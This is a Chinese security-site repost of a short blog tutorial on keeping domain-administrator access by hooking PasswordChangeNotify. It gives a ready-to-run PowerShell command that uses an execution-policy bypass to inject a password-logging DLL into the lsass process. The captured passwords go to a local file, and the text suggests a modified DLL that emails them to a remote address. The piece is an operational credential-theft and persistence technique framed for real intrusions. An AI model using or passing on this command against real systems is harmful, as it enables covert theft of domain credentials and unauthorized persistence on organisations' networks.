维持域管权限的一些简单办法[ Hook PasswordChangeNotify ]-维持域管权限的一些简单办法[ Hook PasswordChangeNotify ]-华盟网

维持域管权限的一些简单办法[ Hook PasswordChangeNotify ]

华盟学院山东省第二期线下学习计划

可利用 Hook PasswordChangeNotify 的方式,无需重启系统,且能实时记录修改的密码,只要目标机器不重启一般都不会失效,具体方法很简单。

首先,准备好 HookPasswordChange.dll 和 Invoke-ReflectivePEInjection.ps1 [主要是用它来把我们事先准备好的 HookPasswordChange.dll 注入到 lsass 进程中,这里有点类似劫持的意思],实际渗透中,并不一定非要把它记录在目标系统的本地文件中[记录到的密码默认放在c:windowstemppasswords.txt文件中],你也可以尝试直接把记录到的账号发送到远程指定的邮箱中[有人已提供改进过的dll],自己去谷歌找找,应该可以找到,下面是在本地测试的实际效果:

1、# powershell –exec bypass –Command "& {Import-Module 'C:Invoke-ReflectivePEInjection.ps1';Invoke-ReflectivePEInjection -PEPath C:HookPasswordChange.dll –procname lsass}"

维持域管权限的一些简单办法[ Hook PasswordChangeNotify ]

实际的效果如下

维持域管权限的一些简单办法[ Hook PasswordChangeNotify ]

维持域管权限的一些简单办法[ Hook PasswordChangeNotify ]

维持域管权限的一些简单办法[ Hook PasswordChangeNotify ]

文章出处:klion's blog

www.idc126.com

原文链接:https://klionsec.github.io/2016/08/16/Hook-PasswordChangeNotify/

本文由来源 klion,由 congtou 整理编辑,其版权均为 klion 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论